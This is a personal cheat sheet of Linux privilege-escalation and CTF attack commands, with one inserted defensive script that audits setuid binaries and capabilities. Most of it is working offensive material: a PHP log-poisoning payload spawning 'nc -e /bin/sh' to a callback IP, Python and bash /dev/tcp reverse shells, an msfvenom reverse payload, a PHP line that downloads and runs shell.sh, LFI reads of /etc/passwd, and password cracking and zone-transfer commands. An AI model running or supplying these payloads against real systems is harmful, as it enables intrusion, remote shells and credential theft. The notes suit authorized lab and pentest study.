Linux Priv Esc. Notes


http://192.168.254.175/index.php?log=/var/log/nginx/access.log

<?php system ('nc -e /bin/sh 192.168.254.128 777'); ?>


compile error
(gcc)
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/; export PATH

rbash bypass
ssh id@ip sh
ssh -X id@ip


cat -> less

python -c 'import pty;pty.spawn("/bin/bash")'
bash -i

export TERM=xterm

if the user belongs to the wireshark group, run wireshark from the console and inspect the requests from all protocols (usernames, passwords).


lsb_release -a

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.128",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
msfvenom -p cmd/unix/reverse_python lhost=192.168.1.108 lport=9876 R    --> 

wpscan --url http://derpnstink.local/weblog -e vt,tt,u,vp,cb,dbe


if the LFI shows nothing in the browser
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.254.200/administrator/alerts/alertConfigField.php |grep sbin




find / \( -perm -u+s -or -perm -g+s  \) -type f -exec ls -l {} \;
find . -perm /4000 
find . -perm /6000
find / -user root -perm -002 -type f -not -path "/proc/*"  2>/dev/null


https://github.com/GTFOBins/GTFOBins.github.io

getcap -r / 2>/dev/null
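Defensive companion to the SUID/SGID find commands and the getcap line above: an added audit helper (not part of these notes) that diffs a host's setuid inventory against an allowlist and flags capabilities that amount to root. The allowlist is an assumption for a Debian-style host and the scan/getcap output is constructed.

```shell
#!/bin/sh
# Added audit helper, not from the original notes. All sample data is constructed.

# Assumed allowlist for a Debian-style host; adjust for your build image.
SETUID_ALLOWLIST='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp'

# Constructed output of `find / -xdev -perm /6000 -type f` on a suspect host.
SAMPLE_SETUID_SCAN='/usr/bin/passwd
/usr/bin/sudo
/tmp/.x/sh
/usr/local/bin/backup-helper
/usr/bin/su'

# Constructed output of `getcap -r / 2>/dev/null`.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep'

# Live collectors; feed their output to the checkers below as a string.
collect_setuid() { find / -xdev \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; }
collect_caps()   { getcap -r / 2>/dev/null; }

# Print every scanned path that is not in the allowlist, one per line, sorted.
unexpected_setuid() {
  scan="$1"; allow="$2"
  printf '%s\n' "$scan" | sort -u | while IFS= read -r path; do
    [ -n "$path" ] || continue
    printf '%s\n' "$allow" | grep -qxF -- "$path" || printf '%s\n' "$path"
  done
}

# Print getcap lines carrying a capability that is effectively root-equivalent.
risky_caps() {
  printf '%s\n' "$1" | grep -E 'cap_(setuid|setgid|sys_admin|dac_override|dac_read_search|sys_ptrace|sys_module)'
}

# Stand-alone run on the constructed data.
echo '== SUID/SGID binaries not in allowlist =='
unexpected_setuid "$SAMPLE_SETUID_SCAN" "$SETUID_ALLOWLIST"
echo '== Root-equivalent capabilities =='
risky_caps "$SAMPLE_GETCAP"
```

On a live host replace the constructed samples with `"$(collect_setuid)"` and `"$(collect_caps)"`, and store the first clean run's allowlist alongside the image so later runs only report drift.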

An Interesting Privilege Escalation vector (getcap/setcap)
https://linux.die.net/man/7/capabilities

Linux Privilege Escalation Checklist
https://0x1.gitlab.io/exploit/Linux-Privilege-Escalation/

https://github.com/DominicBreuker/pspy --process

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O /tmp/ZafiyetTespiti.sh
md5sum /tmp/ZafiyetTespiti.sh

wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.votenow.local" --hw 854 --hc 400 $ip

dig @192.168.254.245 greenoptic.vm axfr

/var/www/.htpasswd --> password for a service (ftp or similar) exposed through the browser

/var/mail/USERS

john --w=/usr/share/wordlists/rockyou.txt

php

smbclient -L ip
smbclient \\\\<ip>\\dizin

------
shell.sh --> bash -i >& /dev/tcp/192.168.254.128/5555 0>&1
select '<?php system("wget 192.168.254.128/shell.sh; chmod +x shell.sh; bash shell.sh");exit;?>'

-----
www-data@e71b67461f6c --> docker users
